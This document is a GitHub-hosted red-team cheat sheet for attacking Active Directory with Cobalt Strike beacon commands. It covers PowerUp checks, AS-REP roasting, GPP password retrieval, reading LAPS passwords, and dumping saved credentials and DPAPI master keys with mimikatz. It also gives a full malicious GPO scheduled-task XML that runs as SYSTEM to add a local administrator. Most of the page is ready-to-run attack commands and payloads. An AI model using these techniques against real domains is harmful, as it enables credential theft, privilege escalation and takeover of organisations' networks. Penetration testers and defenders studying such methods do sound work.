Skip to content

Latest commit

 

History

History
233 lines (168 loc) · 8.15 KB

more-fun-in-ad.md

File metadata and controls

233 lines (168 loc) · 8.15 KB

More fun in AD

Below are a collection of items to run within a new environment to check for

In addition the bloodhound ((Invoke-BloodHound -CollectionMethod All -CompressData -RemoveCSV) and basic net enumeration (net view, computers, dclist, domain_trusts) try looking for the following:

Next try running

Powerup

powershell-import /opt/PowerSploit/Privesc/PowerUp.ps1
powershell Invoke-AllChecks

as well as hamrj0y's powerview tips

https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993

Group functions

Get-NetLocalGroup -ComputerName MX01 -GroupName "Remote Management Users"Gets members of users who can use WinRM on a specific machine.

Get-NetLocalGroup -ComputerName MX01 -GroupName "Remote Desktop Users"Gets members of users who can RDP to a specific machine.

Determine if kerberos pre-auth is not set

#With Powerview

# check for users who don't have kerberos preauthentication set
Get-DomainUser -PreauthNotRequired
Get-DomainUser -UACFilter DONT_REQ_PREAUTH
Invoke-ASREPRoast -Verbose | fl
GPP for setting admin passwords really only applicable to windows 2008 and older. 
After that LAPS is the standard method. 
Still useful to check though in case didn't clean up somewhere

#Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.
powershell-import /opt/PowerSploit/Exfiltration/Get-GPPPassword.ps1
powershell Get-GPPPassword

https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1


(if using offline then use gpp-decrypt) 

Note: Great cheat sheets for powerview, powerup,powersploit, etc.

https://github.com/HarmJ0y/CheatSheets

Note: A great tool for cracking hashes is kwprocessor

./kwp -z basechars/full.base keymaps/en.keymap routes/2-to-16-max-3-direction-changes.route > largekwpshift.txt

LAPS:

Note: This access is not currently in Bloodhound but is planned for a future update

#Import the script into memory
powershell-import /opt/LAPSToolkit/LAPSToolkit.ps1

#Searches through all OUs to see which AD groups can read the ms-Mcs-AdmPwd attribute
powershell Find-LAPSDelegatedGroups

#Parses through ExtendedRights for each AD computer with LAPS enabled and looks for which group has read access and if any user has "All Extended Rights".
powershell Find-AdmPwdExtendedRights 

#Displays all computers with LAPS enabled, password expriation, and password if user has access
powershell Get-LAPSComputers

https://www.harmj0y.net/blog/powershell/running-laps-with-powerview/

https://www.pentestgeek.com/penetration-testing/another-lap-around-microsoft-laps

Token Notes:

You can create a token and pass to obtain a shell when not in elevated process. Additionally, only psexec/psexec_psh work with make_token, not winrm or wmi

make_token .\Administrator P@ssw0rd
ls \\dc01\c$

Credential Manager & DPAPI:

If assume / know the machine is used for RDP, there might be saved credentials.

shell vaultcmd /listcreds:"Windows Credentials" /all

These credentials are stored within the users directory,:

powershell Get-ChildItem C:\Users\<User>\AppData\Local\Microsoft\Credentials\ -Force

Take the output from above command to get details

mimikatz dpapi::cred /in:C:\Users\<User>\AppData\Local\Microsoft\Credentials\<File Name from above command>

Get the Masterkey from cache

mimikatz !sekurlsa::dpapi

Obtain password

mimikatz dpapi::cred /in:C:\Users\<User>\AppData\Local\Microsoft\Credentials\<File Name from earlier command> /masterkey:<key from above command>

Proxychains & RDP:

beacon> socks 1337
nano /etc/proxychains.conf socks4 127.0.0.1 1337
proxychains xfreerdp /u:<username> /v:<IPADDRESS>

GPO Permissions:

https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/

powershell-import /opt/Empire/data/module_source/situational_awareness/network/powerview.ps1

#this outputs the GPOs applied to the WKS01 system
powershell Get-NetGPO -ComputerName WKS01

GPOs can also be viewed in blooodhound now, first type system name in the search field, click node then look at effective inbound GPOs, if one is hanging off from the rest then look into it by noting the GUID and then looking at the ouput of the poweshell command above

powershell Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name}

note the applicable gpcfilesyspath and then
determine what you can edit and possibly upload a malicious ScheduledTasks.xml

Example Malicious XML

<?xml version="1.0" encoding="utf-8"?>
<ScheduledTasks clsid="{XXXXXXX-XXXX-XXXX-XXXX-XXXXXXXX}">
    <ImmediateTaskV5 clsid="{XXXXXXX-XXXX-XXXX-XXXX-XXXXXXXX}" name="OLDGPO" image="0" changed="2016-03-20 12:50:28" uid="{XXXXXXX-XXXX-XXXX-XXXX-XXXXXXXX}" userContext="0" removePolicy="0">
        <Properties action="C" name="OLDGPO" runAs="NT AUTHORITY\System" logonType="S4U">
            <Task version="1.3">
                <RegistrationInfo>
                    <Author>NT AUTHORITY\System</Author>
                    <Description></Description>
                </RegistrationInfo>
                <Principals>
                    <Principal id="Author">
                        <UserId>NT AUTHORITY\System</UserId>
                        <RunLevel>HighestAvailable</RunLevel>
                        <LogonType>S4U</LogonType>
                    </Principal>
                </Principals>
                <Settings>
                    <IdleSettings>
                        <Duration>PT10M</Duration>
                        <WaitTimeout>PT1H</WaitTimeout>
                        <StopOnIdleEnd>true</StopOnIdleEnd>
                        <RestartOnIdle>false</RestartOnIdle>
                    </IdleSettings>
                    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
                    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
                    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
                    <AllowHardTerminate>false</AllowHardTerminate>
                    <StartWhenAvailable>true</StartWhenAvailable>
                    <AllowStartOnDemand>false</AllowStartOnDemand>
                    <Enabled>true</Enabled>
                    <Hidden>true</Hidden>
                    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
                    <Priority>7</Priority>
                    <DeleteExpiredTaskAfter>PT0S</DeleteExpiredTaskAfter>
                    <RestartOnFailure>
                        <Interval>PT15M</Interval>
                        <Count>3</Count>
                    </RestartOnFailure>
                </Settings>
                <Actions Context="Author">
                    <Exec>
                        <Command>powershell</Command>
                        <Arguments>-c "net user coolguy P@ssw0rd1234 /add; net localgroup administrators torch /add"</Arguments>
                    </Exec>
                </Actions>
                <Triggers>
                    <TimeTrigger>
                        <StartBoundary>%LocalTimeXmlEx%</StartBoundary>
                        <EndBoundary>%LocalTimeXmlEx%</EndBoundary>
                        <Enabled>true</Enabled>
                    </TimeTrigger>
                </Triggers>
            </Task>
        </Properties>
    </ImmediateTaskV5>
</ScheduledTasks>

Note:

Reading ACE

ObjectDN - the target of the ACE

Identity Reference - Item that has rights to ObjectDN

ActiveDirectoryRights - Dictates what the IdentityReference can do to ObjectDN

Resources:

https://rastamouse.me/2017/08/jumping-network-segregation-with-rdp/

http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/

https://chryzsh.gitbooks.io/darthsidious/content/enumeration/powerview.html